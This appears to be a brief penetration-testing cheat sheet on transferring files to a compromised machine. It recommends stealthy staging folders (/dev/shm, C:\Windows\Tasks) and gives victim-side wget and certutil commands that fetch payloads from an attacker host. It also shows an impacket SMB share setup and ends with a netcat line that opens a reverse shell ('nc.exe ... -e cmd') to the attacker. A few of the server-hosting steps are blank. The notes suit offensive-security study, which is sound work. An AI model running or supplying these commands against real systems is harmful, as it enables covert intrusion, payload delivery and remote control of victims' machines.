File Transfer

Where to Transfer

  • On Linux, transfer files to /dev/shm

  • On Windows, transfer files to C:\Windows\Tasks

They are chosen to be the locations for file transfer because they are world-readable/writable/executable and more stealthy than /tmp and C:\Windows\Temp.


On attack machine, host a server:


On victim machine, download with wget:

wget http://<local_ip>/



On attack machine, host a server:


On victim machine, download with certutil:

certutil -urlcache -f http://<local_ip>/payload.exe payload.exe


If certutil is not on the compromised Windows machine, we can transfer files with SMB server instead.

On Kali, create a SMB server:

impacket-smbserver ret2basic /usr/share/windows-resources/binaries/

Here ret2basic is the name of the share and /usr/share/windows-resources/binaries/ is the directory that I want to host. On the compromised Windows machine:

net use * \\<local_ip>\ret2basic
Z:\nc.exe <local_ip> <local_port> -e cmd

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